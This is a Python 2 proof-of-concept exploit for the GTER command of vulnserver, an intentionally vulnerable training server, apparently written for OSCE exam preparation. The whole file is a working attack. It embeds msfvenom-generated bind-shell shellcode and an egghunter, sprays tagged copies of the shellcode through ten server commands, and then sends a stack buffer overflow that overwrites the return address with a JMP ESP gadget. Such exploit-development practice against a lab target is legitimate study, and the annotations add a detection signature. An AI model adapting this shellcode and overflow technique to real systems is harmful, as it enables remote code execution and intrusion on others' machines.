#!/usr/bin/python
# Proof-of-concept for the GTER command of vulnserver (an intentionally
# vulnerable training target). Python 2 only: it relies on print statements
# and on str objects being sent over the socket as raw bytes.
import os
import sys
import socket
# os and sys are imported but not used anywhere in this file.
# Target is hard-coded; there is no argument parsing or input validation.
host = "192.168.1.59"
port = 9999
#https://captmeelo.com/exploitdev/osceprep/2018/06/28/vulnserver-gter.html
# msfvenom -p windows/shell_bind_tcp EXITFUNC=thread -b "\x00" -f c
# Payload size: 355 bytes
# 2nd-stage payload: opaque machine code produced by the msfvenom line above.
# Nothing in this file checks its length or contents; the 355-byte figure is
# taken from the generator's comment, not verified here.
shellcode = ("\xdb\xd8\xd9\x74\x24\xf4\x5a\x29\xc9\xbf\xd1\x60\x90\xf9\xb1"
"\x53\x83\xea\xfc\x31\x7a\x13\x03\xab\x73\x72\x0c\xb7\x9c\xf0"
"\xef\x47\x5d\x95\x66\xa2\x6c\x95\x1d\xa7\xdf\x25\x55\xe5\xd3"
"\xce\x3b\x1d\x67\xa2\x93\x12\xc0\x09\xc2\x1d\xd1\x22\x36\x3c"
"\x51\x39\x6b\x9e\x68\xf2\x7e\xdf\xad\xef\x73\x8d\x66\x7b\x21"
"\x21\x02\x31\xfa\xca\x58\xd7\x7a\x2f\x28\xd6\xab\xfe\x22\x81"
"\x6b\x01\xe6\xb9\x25\x19\xeb\x84\xfc\x92\xdf\x73\xff\x72\x2e"
"\x7b\xac\xbb\x9e\x8e\xac\xfc\x19\x71\xdb\xf4\x59\x0c\xdc\xc3"
"\x20\xca\x69\xd7\x83\x99\xca\x33\x35\x4d\x8c\xb0\x39\x3a\xda"
"\x9e\x5d\xbd\x0f\x95\x5a\x36\xae\x79\xeb\x0c\x95\x5d\xb7\xd7"
"\xb4\xc4\x1d\xb9\xc9\x16\xfe\x66\x6c\x5d\x13\x72\x1d\x3c\x7c"
"\xb7\x2c\xbe\x7c\xdf\x27\xcd\x4e\x40\x9c\x59\xe3\x09\x3a\x9e"
"\x04\x20\xfa\x30\xfb\xcb\xfb\x19\x38\x9f\xab\x31\xe9\xa0\x27"
"\xc1\x16\x75\xdd\xc9\xb1\x26\xc0\x34\x01\x97\x44\x96\xea\xfd"
"\x4a\xc9\x0b\xfe\x80\x62\xa3\x03\x2b\x9d\x68\x8d\xcd\xf7\x80"
"\xdb\x46\x6f\x63\x38\x5f\x08\x9c\x6a\xf7\xbe\xd5\x7c\xc0\xc1"
"\xe5\xaa\x66\x55\x6e\xb9\xb2\x44\x71\x94\x92\x11\xe6\x62\x73"
"\x50\x96\x73\x5e\x02\x3b\xe1\x05\xd2\x32\x1a\x92\x85\x13\xec"
"\xeb\x43\x8e\x57\x42\x71\x53\x01\xad\x31\x88\xf2\x30\xb8\x5d"
"\x4e\x17\xaa\x9b\x4f\x13\x9e\x73\x06\xcd\x48\x32\xf0\xbf\x22"
"\xec\xaf\x69\xa2\x69\x9c\xa9\xb4\x75\xc9\x5f\x58\xc7\xa4\x19"
"\x67\xe8\x20\xae\x10\x14\xd1\x51\xcb\x9c\xf1\xb3\xd9\xe8\x99"
"\x6d\x88\x50\xc4\x8d\x67\x96\xf1\x0d\x8d\x67\x06\x0d\xe4\x62"
"\x42\x89\x15\x1f\xdb\x7c\x19\x8c\xdc\x54")
# tag = Capt
# 32 bytes
# 1st-stage egghunter keyed to the "Capt" tag; the matching "CaptCapt" marker
# is prepended to the 2nd stage at send time in the loop below.
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x43\x61\x70\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
# 1st-stage buffer, built so every part lands at a fixed offset:
#   egghunter (32 bytes per the comment above)
#   "A" padding up to a total of 147 bytes
#   4 bytes overwriting the return address (JMP ESP gadget, per its comment)
#   5 bytes jumping backwards into the A's (per its comment)
#   "C" padding up to a total of 5000 bytes
# The lengths and the order of these appends are load-bearing: changing any
# of them shifts every later offset.
buffer = egghunter
buffer += "A"*(147-len(buffer))
buffer += "\xAF\x11\x50\x62" # JMP ESP 625011AF from essfunc.dll
buffer += "\xe9\x64\xff\xff\xff" # JMP 151 bytes backwards to the start of A's
buffer += "C"*(5000-len(buffer))
# For loop to send the 2nd stage shellcode using the available commands
# One fresh TCP connection per command: read the banner, send
# "<command>CaptCapt<shellcode>", read the reply, close. Presumably this is
# meant to leave tagged copies in the target process for the egghunter to
# locate -- not verifiable from this file. There is no error handling: a
# refused connection or a reset raises socket.error and aborts the script.
# Each recv() reads at most 1024 bytes and may return a partial message.
# From a monitoring standpoint, ten consecutive connections to port 9999
# each carrying the fixed "CaptCapt" marker is a simple traffic signature.
for command in ["STATS ", "RTIME ", "LTIME ", "SRUN ", "TRUN ", "GMON ", "GDOG ", "HTER ", "LTER ", "KSTAN "]:
    print "[*]Attempting to store shellcode in " + (command) + " command."
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,port))
    print s.recv(1024)
    shell = command + "CaptCapt" + shellcode
    s.send(shell)
    print s.recv(1024)
    s.close()
# Used to send the 1st stage shellcode
# Final connection: read the banner, send the 5000-byte buffer as the
# argument of GTER, read whatever comes back, close. Same caveats as the
# loop above: no exception handling and a single bounded recv().
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
print "[*] Sending exploit..."
s.send("GTER /.:/" + buffer)
print s.recv(1024)
s.close()